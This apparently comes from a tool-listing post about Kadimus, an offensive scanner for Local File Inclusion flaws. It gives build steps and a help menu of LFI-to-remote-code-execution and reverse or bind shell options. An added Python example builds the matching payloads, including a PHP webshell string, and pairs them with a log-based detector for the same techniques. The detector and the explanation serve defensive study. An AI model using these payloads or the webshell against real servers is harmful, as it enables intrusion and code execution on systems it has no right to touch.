Kadimus is a scanner and exploitation tool for Local File Inclusion (LFI) vulnerabilities: it detects the flaw in a target's URL parameters and then escalates it to remote code execution or source-code disclosure.
Installation

Clone the repository, run the configure script, then build:

```shell
git clone https://github.com/P0cL4bs/Kadimus.git
cd Kadimus
./configure
make
```
Features
- Checks every URL parameter of the target
- RCE via /var/log/auth.log (the PHP code is injected through an SSH login attempt, see --ssh-target and --ssh-port)
- RCE via /proc/self/environ
- RCE via php://input
- RCE via data://text
- Source code disclosure (via the php://filter wrapper)
- Multi-threaded scanner
- Command shell interface over HTTP requests
- Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)
- SOCKS5 proxy support for bind-shell connections
Usage

```
-h, --help                    Display this help menu

Request:
  -B, --cookie STRING         Set custom HTTP Cookie header
  -A, --user-agent STRING     User-Agent to send to server
  --connect-timeout SECONDS   Maximum time allowed for connection
  --retry-times NUMBER        Number of times to retry if connection fails
  --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

Scanner:
  -u, --url STRING            Single URI to scan
  -U, --url-list FILE         File containing URIs to scan
  -o, --output FILE           File to save output results
  --threads NUMBER            Number of threads (2..1000)

Exploitation:
  -t, --target STRING         Vulnerable target to exploit
  --injec-at STRING           Parameter name to inject exploit (only needed with RCE data and source disclosure)

RCE:
  -X, --rce-technique=TECH    LFI to RCE technique to use
  -C, --code STRING           Custom PHP code to execute, with php brackets
  -c, --cmd STRING            Execute system command on vulnerable target system
  -s, --shell                 Simple command shell interface through HTTP Request
  -r, --reverse-shell         Try to spawn a reverse shell connection
  -l, --listen NUMBER         Port to listen on
  -b, --bind-shell            Try to connect to a bind shell
  -i, --connect-to STRING     IP/Hostname to connect to
  -p, --port NUMBER           Port number to connect to
  --b-proxy STRING            IP/Hostname of socks5 proxy
  --b-port NUMBER             Port number of socks5 proxy
  --ssh-port NUMBER           Set the SSH port to try to inject command (Default: 22)
  --ssh-target STRING         Set the SSH host

  RCE available techniques:
    environ                   Try to run PHP code using /proc/self/environ
    input                     Try to run PHP code using php://input
    auth                      Try to run PHP code using /var/log/auth.log
    data                      Try to run PHP code using data://text

Source Disclosure:
  -G, --get-source            Try to get the source files using filter://
  -f, --filename STRING       Set filename to grab source [REQUIRED]
  -O FILE                     Set output file (Default: stdout)
```
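The following is an added example, not Kadimus code and not from the original post. It builds the value each technique in the feature list places in the vulnerable parameter (assuming the standard PHP stream-wrapper syntax for php://filter, data:// and php://input, and an assumed traversal depth for the log-file techniques) and then runs a small detector over constructed Apache-style access-log lines and sshd auth.log lines, so the same techniques can be recognised from the defender's side. All host names, paths and log lines are constructed for the demo.

```python
"""Request shapes behind the Kadimus LFI techniques, plus log-side detection.

Added example, not Kadimus code. Wrapper syntax is assumed from PHP's stream
wrappers; every log line below is constructed for the demo.
"""
import base64
import re
import urllib.parse

# ---- Attacker side: what each technique puts into the vulnerable parameter ----

def filter_source_payload(filename):
    # php://filter returns the file base64-encoded instead of executing it,
    # which is the mechanism behind source disclosure (-G / --get-source).
    return "php://filter/convert.base64-encode/resource=" + filename


def data_rce_payload(php_code):
    # data:// carries the PHP inline (assumed form; requires allow_url_include=On).
    b64 = base64.b64encode(php_code.encode()).decode()
    return "data://text/plain;base64," + b64


def log_include_payload(path, depth=6):
    # Traversal to a file the attacker has already written PHP into
    # (/proc/self/environ or /var/log/auth.log). Depth of 6 is an assumption.
    return "../" * depth + path.lstrip("/")


def decode_disclosed_source(body):
    # Reverse the base64 that php://filter hands back.
    return base64.b64decode(body.strip()).decode()


# ---- Defender side: flag the same techniques in logs --------------------------

ACCESS_SIGNATURES = [
    ("php_filter_disclosure", re.compile(r"php://filter", re.I)),
    ("data_wrapper_rce", re.compile(r"data:(//)?text/", re.I)),
    ("php_input_rce", re.compile(r"php://input", re.I)),
    ("proc_environ", re.compile(r"/proc/self/environ", re.I)),
    ("auth_log_include", re.compile(r"/var/log/auth\.log", re.I)),
    ("traversal", re.compile(r"(\.\./){2,}")),
]
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
# sshd logs the attempted username verbatim, so a poisoned auth.log line
# carries a PHP open tag inside "Invalid user ...".
AUTH_POISON = re.compile(r"Invalid user .*<\?(php|=)", re.I)


def classify_access_line(line):
    m = REQUEST_TARGET.search(line)
    if not m:
        return []
    # Decode twice: the log keeps the raw request and attackers double-encode.
    target = urllib.parse.unquote(urllib.parse.unquote(m.group("target")))
    return [name for name, rx in ACCESS_SIGNATURES if rx.search(target)]


def scan_access_log(lines):
    # Return {line index: [technique names]} for every line that fires a signature.
    hits = {}
    for i, line in enumerate(lines):
        names = classify_access_line(line)
        if names:
            hits[i] = names
    return hits


def is_poisoned_auth_line(line):
    return bool(AUTH_POISON.search(line))


# ---- Constructed sample logs (not real traffic) -------------------------------
PHP_CMD = "<?php system($_GET['c']); ?>"
_T = '10.0.0.5 - - [01/Jan/2020:00:00:0%d +0000] "%s /index.php?page=%s HTTP/1.1" 200 512'
SAMPLE_ACCESS_LOG = [
    _T % (1, "GET", "about"),                                   # benign
    _T % (2, "GET", filter_source_payload("index.php")),         # source disclosure
    _T % (3, "GET", urllib.parse.quote(                          # environ, URL-encoded
        log_include_payload("/proc/self/environ"), safe="")),
    _T % (4, "POST", "php://input"),                             # php://input
    _T % (5, "GET", data_rce_payload(PHP_CMD) + "&c=id"),         # data://
    _T % (6, "GET", log_include_payload("/var/log/auth.log") + "&c=id"),
]
SAMPLE_AUTH_LOG = [
    "Jan  1 00:00:07 web sshd[2211]: Accepted publickey for deploy from 10.0.0.9 port 40000 ssh2",
    "Jan  1 00:00:08 web sshd[2212]: Invalid user " + PHP_CMD + " from 10.0.0.5 port 51234",
]

if __name__ == "__main__":
    for i, names in scan_access_log(SAMPLE_ACCESS_LOG).items():
        print(i, names)
    print([is_poisoned_auth_line(l) for l in SAMPLE_AUTH_LOG])
    # Round trip of the source-disclosure decode on the data:// body:
    print(decode_disclosed_source(data_rce_payload(PHP_CMD).split(",", 1)[1]) == PHP_CMD)
```

The detector matches on the URL-decoded request target, since log-poisoning and wrapper payloads are routinely percent-encoded once or twice; the generic traversal signature fires alongside the specific file signatures so that a novel target file still produces an alert. For the auth.log technique the useful signal is on the host itself: an "Invalid user" line containing a PHP open tag is the poisoning step, and it appears before the include request ever reaches the web server.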
You can download Kadimus from https://github.com/P0cL4bs/Kadimus.